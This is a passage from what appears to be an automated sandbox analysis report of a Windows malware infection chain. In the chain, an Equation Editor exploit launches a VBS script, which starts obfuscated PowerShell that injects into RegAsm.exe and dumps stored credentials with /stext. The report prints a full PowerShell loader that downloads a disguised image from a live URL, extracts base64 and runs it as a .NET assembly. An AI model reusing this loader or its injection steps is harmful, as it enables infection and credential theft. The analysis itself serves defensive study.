                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2140Thread sleep count: 187 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2140Thread sleep time: -93500s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2896Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1980Thread sleep count: 8431 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1980Thread sleep time: -25293000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3260Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_0040928E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,14_2_0041C322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,14_2_0040C388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,14_2_004096A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,14_2_00408847
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407877 FindFirstFileW,FindNextFileW,14_2_00407877
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044E8F9 FindFirstFileExA,14_2_0044E8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,14_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,14_2_00419B86
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,14_2_0040BD72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_100010F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10006580 FindFirstFileExA,14_2_10006580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040AE51 FindFirstFileW,FindNextFileW,15_2_0040AE51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407898
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,14_2_00407CD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00418981 memset,GetSystemInfo,15_2_00418981
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end node
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00434A8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,15_2_0040DD85
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041CBE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00443355 mov eax, dword ptr fs:[00000030h]14_2_00443355
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10004AB4 mov eax, dword ptr fs:[00000030h]14_2_10004AB4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,14_2_00411D39
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: Debug
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00434BD8 SetUnhandledExceptionFilter,14_2_00434BD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0043503C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00434A8A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_0043BB71
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_100060E2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_10002639
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_10002B1C

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3264, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2692, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,14_2_0041812A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe14_2_00412132
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00419662 mouse_event,14_2_00419662
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedsmoothbunwithbutterc.vBS" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FCBR/77/19.432.481.731//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\eibgqlhhydk"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\pcgrqdsjmlcrsdy"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zeljrwdcztuwukmaun"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? 